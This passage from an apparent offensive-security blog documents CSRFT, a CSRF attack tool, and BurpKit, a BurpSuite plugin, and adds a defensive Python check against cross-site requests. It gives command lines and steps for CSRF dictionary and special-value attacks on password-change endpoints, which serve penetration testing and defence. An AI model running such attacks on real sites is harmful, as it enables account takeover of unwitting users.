            "comment": "The final step is to logout the admin"
          }
        ]
      }
    ]
  }
}

You can now define some "steps", different attacks that will be executed in a certain order.
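Every step in these scenarios relies on the same three weaknesses in the target: state changes accepted over GET, no check of where the request came from, and no per-session secret in the form. The server-side check below is the defender's counterpart to the configuration above and is an added example, not part of CSRFT. The site origin, the session layout and the two constructed requests (modelled on the GET and POST scenarios shown, with the tool's default 0.0.0.0:8080 listener as the cross-site origin) are assumptions for the demonstration.

```python
"""Server-side authorization for state-changing requests: refuse safe methods,
verify the request origin, and require a per-session anti-CSRF token.
Origin, session layout and sample requests are constructed for this example."""
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

SITE_ORIGIN = "https://www.vulnerable.com"   # hypothetical: the site being defended
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def new_session() -> Dict[str, str]:
    """One random token per session; the site embeds it in its own forms."""
    return {"csrf_token": secrets.token_urlsafe(32)}


def _request_origin(headers: Dict[str, str]) -> Optional[str]:
    """scheme://host[:port] from Origin, falling back to Referer; None if absent."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value:
        return None
    parts = urlsplit(value)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}"


def authorize_state_change(request: Dict, session: Dict[str, str]) -> Tuple[bool, str]:
    """Call from any handler that changes state (password change, role upgrade, logout).
    Fails closed: a missing Origin/Referer or a missing token is a rejection."""
    if request["method"].upper() in SAFE_METHODS:
        return False, "state change attempted with a safe method"
    if _request_origin(request.get("headers", {})) != SITE_ORIGIN:
        return False, "origin mismatch"
    submitted = request.get("form", {}).get("csrf_token", "")
    expected = session.get("csrf_token", "")
    # constant-time comparison; encode so non-ASCII input cannot raise
    if not expected or not hmac.compare_digest(submitted.encode(), expected.encode()):
        return False, "missing or invalid csrf token"
    return True, "ok"


# Constructed requests modelled on the GET and POST scenarios in the configuration above.
CSRFT_STYLE_GET = {
    "method": "GET",
    "headers": {"Referer": "http://0.0.0.0:8080/"},
    "form": {},
    "url": "http://www.vulnerable.com/changePassword.php?newPassword=csrfAttacks",
}
CSRFT_STYLE_POST = {
    "method": "POST",
    "headers": {"Origin": "http://0.0.0.0:8080"},
    "form": {"newPassword": "csrfAttacks"},
}


def legitimate_post(session: Dict[str, str]) -> Dict:
    """What the site's own form submission looks like: same origin plus the session token."""
    return {"method": "POST", "headers": {"Origin": SITE_ORIGIN},
            "form": {"newPassword": "chosen-by-user", "csrf_token": session["csrf_token"]}}


if __name__ == "__main__":
    session = new_session()
    for label, req in [("cross-site GET", CSRFT_STYLE_GET),
                       ("cross-site POST", CSRFT_STYLE_POST),
                       ("same-site POST", legitimate_post(session))]:
        print(label, authorize_state_change(req, session))
```

The order of the checks matters: the method test removes the GET scenarios outright, the origin test rejects a form submitted from another page even before the token is inspected, and the token test covers the case where the Origin header is missing or has been made to look right. Setting the session cookie with the SameSite attribute adds a fourth, browser-enforced layer that none of the three scenarios above can pass.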

Use cases

A) I want to write my specific JSON configuration file and launch it by hand
Based on the templates which are available, you can easily create your own. If you have any trouble creating it, feel free to contact me and I'll try to help you as much as I can, but it shouldn't be this complicated.
Steps to succeed :
1) Create your configuration file, see samples in conf/ folder
2) Add your .html files in the exploits/ folder with the different payloads if the CSRF is POST vulnerable
3) If you want to do a dictionary attack, add your dictionary file to the dicos/ folder,
4) Replace the value of the field you want to perform this attack with the token <%value%>
=> either in your urls if GET exploitation, or in the HTML files if POST exploitation.
5) Launch the application : node server.js conf/test.json


B) I want to automate attacks really easily
To do so, I developed a Python script csrft_utils.py in utils folder that will do this for you.
Here are some basic use cases :
* GET parameter with dictionary attack : *
$ python csrft_utils.py --url="http://www.vulnerable.com/changePassword.php?newPassword=csvulnerableParameter" --param=newPassword --dico_file="../dicos/passwords.txt"
* POST parameter with Special value attack : *
$ python csrft_utils.py --form=http://website.com/user.php --id=changePassword --param=password password=newPassword --special_value



Burpkit - Next-Gen Burpsuite Penetration Testing Tool



Welcome to the next generation of web application penetration testing - using WebKit to own the web. BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional JavaScript bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.

System Requirements
BurpKit has the following system requirements:
  • Oracle JDK >=8u50 and <9 (Download)
  • At least 4GB of RAM

Installation
Installing BurpKit is simple:
  1. Download the latest prebuilt release from the GitHub releases page.
  2. Open BurpSuite and navigate to the Extender tab.
  3. Under Burp Extensions click the Add button.
  4. In the Load Burp Extension dialog, make sure that Extension Type is set to Java and click the Select file... button under Extension Details.
  5. Select the BurpKit-<version>.jar file and click Next when done.
If all goes well, you will see three additional top-level tabs appear in BurpSuite:
  1. BurpKitty : a courtesy browser for navigating the web within BurpSuite.
  2. BurpScript IDE : a lightweight integrated development environment for writing JavaScript-based BurpSuite plugins and other things.
  3. Jython : an integrated python interpreter console and lightweight script text editor.

BurpScript
BurpScript enables users to write desktop-based JavaScript applications as well as BurpSuite extensions using the JavaScript scripting language. This is achieved by injecting two new objects by default into the DOM on page load:
  1. burpKit : provides numerous features including file system I/O support and easy JS library injection.
  2. burpCallbacks : the JavaScript equivalent of the IBurpExtenderCallbacks interface in Java with a few slight modifications.
Take a look at the examples folder for more information.

More Information?
A readable version of the docs can be found here.


Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community